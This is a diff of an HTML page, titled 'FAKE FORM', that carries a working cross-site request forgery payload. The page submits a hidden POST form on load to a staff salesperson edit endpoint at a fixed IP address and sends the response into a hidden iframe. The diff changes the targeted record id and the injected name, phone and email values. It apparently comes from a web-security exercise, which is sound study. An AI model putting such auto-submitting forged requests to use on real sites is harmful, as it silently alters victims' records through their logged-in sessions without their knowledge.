--- a/form.html
+++ b/form.html
@@ -3,11 +3,11 @@
         <title>FAKE FORM</title>
     </head>
   <body onload="document.form.submit()">
-    <form action="https://35.184.88.145/red/public/staff/salespeople/edit.php?id=5" method="POST" name="form" style="display: none;" target="hidden_results" >
-      <input type="text" name="first_name" value="Ken" />
-      <input type="text" name="last_name" value="BAAAARRRLLER" />
-      <input type="text" name="phone" value="555-352-9654" />
-      <input type="text" name="email" value="kbarker@salesperson.com" />
+    <form action="https://35.184.88.145/red/public/staff/salespeople/edit.php?id=6" method="POST" name="form" style="display: none;" target="hidden_results" >
+      <input type="text" name="first_name" value="Elizabeth" />
+      <input type="text" name="last_name" value="Suzuki" />
+      <input type="text" name="phone" value="555-352-9604" />
+      <input type="text" name="email" value="suzuki@salesperson.com" />
     </form>
     <iframe name="hidden_results" style="display:   none;" ></iframe>
   </body>
